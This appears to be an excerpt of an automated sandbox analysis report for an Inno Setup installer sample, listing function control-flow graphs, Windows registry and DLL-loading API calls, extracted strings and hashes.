                                                                                                            control_flow_graph 406 46e080-46e0b2 407 46e0b4-46e0bb 406->407 408 46e0cf 406->408 410 46e0c6-46e0cd 407->410 411 46e0bd-46e0c4 407->411 409 46e0d6-46e10e call 403634 call 403738 call 42dde8 408->409 418 46e110-46e124 call 403738 call 42dde8 409->418 419 46e129-46e152 call 403738 call 42dd0c 409->419 410->409 411->408 411->410 418->419 427 46e154-46e15d call 46dd50 419->427 428 46e162-46e18b call 46de6c 419->428 427->428 432 46e19d-46e1a0 call 403400 428->432 433 46e18d-46e19b call 403494 428->433 437 46e1a5-46e1f0 call 46de6c call 42c40c call 46deb4 call 46de6c 432->437 433->437 446 46e206-46e227 call 454ab8 call 46de6c 437->446 447 46e1f2-46e205 call 46dedc 437->447 454 46e27d-46e284 446->454 455 46e229-46e27c call 46de6c call 478464 call 46de6c call 478464 call 46de6c 446->455 447->446 456 46e286-46e2c3 call 478464 call 46de6c call 478464 call 46de6c 454->456 457 46e2c4-46e2cb 454->457 455->454 456->457 459 46e30c-46e331 call 40b44c call 46de6c 457->459 460 46e2cd-46e30b call 46de6c * 3 457->460 481 46e333-46e33e call 47ad88 459->481 482 46e340-46e349 call 403494 459->482 460->459 491 46e34e-46e51b call 403778 call 46de6c call 47ad88 call 46deb4 call 403494 call 40357c * 2 call 46de6c call 403494 call 40357c * 2 call 46de6c call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 481->491 482->491 556 46e531-46e53f call 46dedc 491->556 557 46e51d-46e52f call 46de6c 491->557 561 46e544 556->561 562 46e545-46e58e call 46dedc call 46df10 call 46de6c call 47ad88 call 46df74 557->562 561->562 573 46e5b4-46e5be 562->573 574 46e590-46e5ae call 46dedc * 2 562->574 576 46e5c4-46e5cb 573->576 577 46e662-46e669 573->577 588 46e5b3 574->588 581 46e62f-46e63a 576->581 582 46e5cd-46e5f1 call 430a40 576->582 578 46e6c3-46e6d9 RegCloseKey 577->578 579 46e66b-46e6a1 call 49314c 577->579 579->578 585 46e63d-46e641 581->585 582->585 592 46e5f3-46e5f4 582->592 585->577 589 46e643-46e65c call 430a7c call 46dedc 585->589 588->573 598 46e661 589->598 594 46e5f6-46e61c call 40b44c call 4780d8 592->594 601 46e61e-46e624 call 430a40 594->601 602 46e629-46e62b 594->602 598->577 601->602 602->594 604 46e62d 602->604 604->585
                                                                                                            APIs
                                                                                                              • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                                            • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValue
                                                                                                            • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                            • API String ID: 3132538880-1122008755
                                                                                                            • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                                            • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                                                            • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                                            • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1019 490c98-490ccc call 403684 1022 490cce-490cdd call 4467f0 Sleep 1019->1022 1023 490ce2-490cef call 403684 1019->1023 1028 491172-49118c call 403420 1022->1028 1029 490d1e-490d2b call 403684 1023->1029 1030 490cf1-490d19 call 44684c call 403738 FindWindowA call 446acc 1023->1030 1037 490d5a-490d67 call 403684 1029->1037 1038 490d2d-490d50 call 44684c call 403738 FindWindowA call 446acc 1029->1038 1030->1028 1047 490d69-490dab call 4467f0 * 4 SendMessageA call 446acc 1037->1047 1048 490db0-490dbd call 403684 1037->1048 1056 490d55 1038->1056 1047->1028 1057 490e0c-490e19 call 403684 1048->1057 1058 490dbf-490e07 call 4467f0 * 4 PostMessageA call 446924 1048->1058 1056->1028 1067 490e68-490e75 call 403684 1057->1067 1068 490e1b-490e63 call 4467f0 * 4 SendNotifyMessageA call 446924 1057->1068 1058->1028 1080 490ea2-490eaf call 403684 1067->1080 1081 490e77-490e9d call 44684c call 403738 RegisterClipboardFormatA call 446acc 1067->1081 1068->1028 1092 490eb1-490eeb call 4467f0 * 3 SendMessageA call 446acc 1080->1092 1093 490ef0-490efd call 403684 1080->1093 1081->1028 1092->1028 1108 490eff-490f3f call 4467f0 * 3 PostMessageA call 446924 1093->1108 1109 490f44-490f51 call 403684 1093->1109 1108->1028 1119 490f98-490fa5 call 403684 1109->1119 1120 490f53-490f93 call 4467f0 * 3 SendNotifyMessageA call 446924 1109->1120 1131 490ffa-491007 call 403684 1119->1131 1132 490fa7-490fc5 call 44684c call 42e2bc 1119->1132 1120->1028 1142 491009-491035 call 44684c call 403738 call 4467f0 GetProcAddress 1131->1142 1143 491081-49108e call 403684 1131->1143 1152 490fd7-490fe5 GetLastError call 446acc 1132->1152 1153 490fc7-490fd5 call 446acc 1132->1153 1177 491071-49107c call 446924 1142->1177 1178 491037-49106c call 4467f0 * 2 call 446acc call 446924 1142->1178 1157 491090-4910b1 call 4467f0 FreeLibrary call 446924 1143->1157 1158 4910b6-4910c3 call 403684 1143->1158 1164 490fea-490ff5 call 446acc 1152->1164 1153->1164 1157->1028 1170 4910e8-4910f5 call 403684 1158->1170 1171 4910c5-4910e3 call 44684c call 403738 CreateMutexA 1158->1171 1164->1028 1185 49112b-491138 call 403684 1170->1185 1186 4910f7-491129 call 48ae84 call 403574 call 403738 OemToCharBuffA call 48ae9c 1170->1186 1171->1028 1177->1028 1178->1028 1195 49113a-49116c call 48ae84 call 403574 call 403738 CharToOemBuffA call 48ae9c 1185->1195 1196 49116e 1185->1196 1186->1028 1195->1028 1196->1028
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindSleepWindow
                                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                            • API String ID: 3078808852-3310373309
                                                                                                            • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                                            • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                                                            • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                                            • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1573 481df0-481e15 GetModuleHandleA GetProcAddress 1574 481e7c-481e81 GetSystemInfo 1573->1574 1575 481e17-481e2d GetNativeSystemInfo GetProcAddress 1573->1575 1577 481e86-481e8f 1574->1577 1576 481e2f-481e3a GetCurrentProcess 1575->1576 1575->1577 1576->1577 1586 481e3c-481e40 1576->1586 1578 481e9f-481ea6 1577->1578 1579 481e91-481e95 1577->1579 1580 481ec1-481ec6 1578->1580 1582 481ea8-481eaf 1579->1582 1583 481e97-481e9b 1579->1583 1582->1580 1584 481e9d-481eba 1583->1584 1585 481eb1-481eb8 1583->1585 1584->1580 1585->1580 1586->1577 1588 481e42-481e49 call 451d7c 1586->1588 1588->1577 1591 481e4b-481e58 GetProcAddress 1588->1591 1591->1577 1592 481e5a-481e71 GetModuleHandleA GetProcAddress 1591->1592 1592->1577 1593 481e73-481e7a 1592->1593 1593->1577
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                            • API String ID: 2230631259-2623177817
                                                                                                            • Opcode ID: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                                            • Instruction ID: 139b281cd70ff203116dc437a84a2e67e00dfa051846aebc7d59a7e7d95df608
                                                                                                            • Opcode Fuzzy Hash: ee5804469110e506db367347f51c824ce5616b51277ad345f7f2ea83579cd2a3
                                                                                                            • Instruction Fuzzy Hash: B1110D41504341D4DB2077BA6C45B7F2A8C8B11319F080C3B6C50662F3CA7C8887DBAF

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1594 472708-47273b 1595 472e26-472e5a call 46d4ec call 403400 * 2 call 403420 1594->1595 1596 472741-472745 1594->1596 1598 47274c-472789 call 40b44c call 4780d8 1596->1598 1607 47278f-4727ce call 47c6f0 call 477d4c call 47ad88 * 2 1598->1607 1608 472e1a-472e20 1598->1608 1620 4727d4-4727db 1607->1620 1621 4727d0 1607->1621 1608->1595 1608->1598 1622 4727f4-47280d 1620->1622 1623 4727dd-4727e4 1620->1623 1621->1620 1626 472833-47283a 1622->1626 1627 47280f-472819 call 472538 1622->1627 1624 4727e6-4727eb call 4529a4 1623->1624 1625 4727f0 1623->1625 1624->1625 1625->1622 1630 47283c-472843 1626->1630 1631 472849-472850 1626->1631 1627->1626 1636 47281b-47282e call 403738 call 42dde8 1627->1636 1630->1631 1633 472cf7-472d2d 1630->1633 1634 4728a3-4728c3 call 47255c 1631->1634 1635 472852-472859 1631->1635 1633->1622 1643 472d33-472d3a 1633->1643 1646 472936-47293d 1634->1646 1647 4728c5-4728ea call 403738 call 42dd0c 1634->1647 1635->1634 1639 47285b-47287d call 403738 call 42dd44 1635->1639 1636->1626 1639->1633 1667 472883-47289e call 403738 RegDeleteValueA RegCloseKey 1639->1667 1648 472d6d-472d74 1643->1648 1649 472d3c-472d46 call 472538 1643->1649 1654 472986 1646->1654 1655 47293f-472963 call 403738 call 42dd44 1646->1655 1682 4728ef-4728f3 1647->1682 1652 472da7-472dae 1648->1652 1653 472d76-472d80 call 472538 1648->1653 1649->1648 1666 472d48-472d68 call 459ad4 1649->1666 1663 472db0-472dd6 call 459ad4 1652->1663 1664 472ddb-472de2 1652->1664 1653->1652 1680 472d82-472da2 call 459ad4 1653->1680 1660 47298b-47298d 1654->1660 1655->1660 1697 472965-472968 1655->1697 1660->1633 1668 472993-4729a8 1660->1668 1663->1664 1673 472de4-472e0a call 459ad4 1664->1673 1674 472e0f-472e15 call 477d78 1664->1674 1666->1648 1667->1633 1678 4729bc-4729c3 1668->1678 1679 4729aa-4729b7 call 403738 RegDeleteValueA 1668->1679 1673->1674 1674->1608 1686 472cd9-472cef RegCloseKey 1678->1686 1687 4729c9-4729d0 1678->1687 1679->1678 1680->1652 1690 4728f5-4728f9 1682->1690 1691 47291a-472921 1682->1691 1695 4729d2-4729e6 call 403738 call 42dc8c 1687->1695 1696 4729ec-4729f9 1687->1696 1690->1660 1692 4728ff-472918 call 47255c 1690->1692 1691->1660 1693 472923-472934 call 46dd50 1691->1693 1692->1660 1693->1660 1695->1686 1695->1696 1696->1686 1698 4729ff 1696->1698 1697->1660 1702 47296a-472971 1697->1702 1698->1686 1703 472c26-472c41 call 47ad88 call 430acc 1698->1703 1704 472bc4-472bfd call 47ad88 call 406da0 call 403738 RegSetValueExA 1698->1704 1705 472a22-472a2c 1698->1705 1706 472c8b-472cbd call 403574 call 403738 * 2 RegSetValueExA 1698->1706 1702->1660 1710 472973-472984 call 46dd50 1702->1710 1737 472c43-472c48 call 4529a4 1703->1737 1738 472c4d-472c6d call 403738 RegSetValueExA 1703->1738 1704->1686 1756 472c03-472c0a 1704->1756 1712 472a35-472a3a 1705->1712 1713 472a2e-472a31 1705->1713 1706->1686 1752 472cbf-472cc6 1706->1752 1710->1660 1722 472a41-472a43 1712->1722 1719 472a33 1713->1719 1720 472a3c 1713->1720 1719->1722 1720->1722 1728 472ae0-472af2 call 40385c 1722->1728 1729 472a49-472a5b call 40385c 1722->1729 1747 472af4-472b0b call 403738 call 42dc80 1728->1747 1748 472b0d-472b10 call 403400 1728->1748 1744 472a76-472a79 call 403400 1729->1744 1745 472a5d-472a74 call 403738 call 42dc74 1729->1745 1737->1738 1738->1686 1763 472c6f-472c76 1738->1763 1759 472a7e-472a85 1744->1759 1745->1744 1745->1759 1747->1748 1760 472b15-472b4e call 47ada8 1747->1760 1748->1760 1752->1686 1761 472cc8-472cd4 call 46dd50 1752->1761 1756->1686 1758 472c10-472c21 call 46dd50 1756->1758 1758->1686 1766 472a87-472aa5 call 403738 RegQueryValueExA 1759->1766 1767 472ab6-472adb call 47ada8 1759->1767 1781 472b50-472b60 call 403574 1760->1781 1782 472b6f-472b9b call 403574 call 403738 * 2 RegSetValueExA 1760->1782 1761->1686 1763->1686 1771 472c78-472c89 call 46dd50 1763->1771 1766->1767 1784 472aa7-472aab 1766->1784 1767->1782 1771->1686 1781->1782 1792 472b62-472b6a call 40357c 1781->1792 1782->1686 1797 472ba1-472ba8 1782->1797 1787 472ab3 1784->1787 1788 472aad-472ab1 1784->1788 1787->1767 1788->1767 1788->1787 1792->1782 1797->1686 1798 472bae-472bbf call 46dd50 1797->1798 1798->1686
                                                                                                            APIs
                                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?,0049B178), ref: 00472890
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 00472899
                                                                                                              • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472CF0,?,?,00000000,00472D01,?,?,?,?,00000000,00472E5B,?,?), ref: 004729B7
                                                                                                              • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                                              • Part of subcall function 0047255C: GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorLastValue$CloseCreate
                                                                                                            • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                                                            • API String ID: 2638610037-3092547568
                                                                                                            • Opcode ID: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                                            • Instruction ID: 0e42c6b5a9d89693cebc7f702fd10ac1157821fa568552e70b891395feb5272a
                                                                                                            • Opcode Fuzzy Hash: 60c61eb47bec3a2eac8f774f64e080f7387afc8de715dc427226ed339478b351
                                                                                                            • Instruction Fuzzy Hash: BE320D74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1801 4684c8-468500 call 47ad88 1804 468506-468516 call 4778cc 1801->1804 1805 4686e2-4686fc call 403420 1801->1805 1810 46851b-468560 call 4078fc call 403738 call 42dd44 1804->1810 1816 468565-468567 1810->1816 1817 46856d-468582 1816->1817 1818 4686d8-4686dc 1816->1818 1819 468597-46859e 1817->1819 1820 468584-468592 call 42dc74 1817->1820 1818->1805 1818->1810 1822 4685a0-4685c2 call 42dc74 call 42dc8c 1819->1822 1823 4685cb-4685d2 1819->1823 1820->1819 1822->1823 1844 4685c4 1822->1844 1824 4685d4-4685f9 call 42dc74 * 2 1823->1824 1825 46862b-468632 1823->1825 1847 4685fb-468604 call 478558 1824->1847 1848 468609-46861b call 42dc74 1824->1848 1829 468634-468646 call 42dc74 1825->1829 1830 468678-46867f 1825->1830 1840 468656-468668 call 42dc74 1829->1840 1841 468648-468651 call 478558 1829->1841 1832 468681-4686b5 call 42dc74 * 3 1830->1832 1833 4686ba-4686d0 RegCloseKey 1830->1833 1832->1833 1840->1830 1854 46866a-468673 call 478558 1840->1854 1841->1840 1844->1823 1847->1848 1848->1825 1858 46861d-468626 call 478558 1848->1858 1854->1830 1858->1825
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(?,004686E2,?,?,00000001,00000000,00000000,004686FD,?,00000000,00000000,?), ref: 004686CB
                                                                                                            Strings
                                                                                                            • Inno Setup: User Info: Organization, xrefs: 0046869A
                                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468659
                                                                                                            • Inno Setup: User Info: Name, xrefs: 00468687
                                                                                                            • Inno Setup: Icon Group, xrefs: 004685A6
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                                                            • Inno Setup: User Info: Serial, xrefs: 004686AD
                                                                                                            • Inno Setup: Deselected Components, xrefs: 0046860C
                                                                                                            • Inno Setup: App Path, xrefs: 0046858A
                                                                                                            • Inno Setup: Setup Type, xrefs: 004685DA
                                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                                                            • %s\%s_is1, xrefs: 00468545
                                                                                                            • Inno Setup: No Icons, xrefs: 004685B3
                                                                                                            • Inno Setup: Selected Components, xrefs: 004685EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen
                                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                            • API String ID: 47109696-1093091907
                                                                                                            • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                                            • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                                                            • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                                                            • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2019 47b8dc-47b932 call 42c40c call 4035c0 call 47b558 call 451c38 2028 47b934-47b939 call 4529a4 2019->2028 2029 47b93e-47b94d call 451c38 2019->2029 2028->2029 2033 47b967-47b96d 2029->2033 2034 47b94f-47b955 2029->2034 2037 47b984-47b9ac call 42e2bc * 2 2033->2037 2038 47b96f-47b975 2033->2038 2035 47b977-47b97f call 403494 2034->2035 2036 47b957-47b95d 2034->2036 2035->2037 2036->2033 2039 47b95f-47b965 2036->2039 2045 47b9d3-47b9ed GetProcAddress 2037->2045 2046 47b9ae-47b9ce call 4078fc call 4529a4 2037->2046 2038->2035 2038->2037 2039->2033 2039->2035 2047 47b9ef-47b9f4 call 4529a4 2045->2047 2048 47b9f9-47ba16 call 403400 * 2 2045->2048 2046->2045 2047->2048
                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047B9DE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                                                            • API String ID: 190572456-2632518235
                                                                                                            • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                                            • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                                                            • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                                                            • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
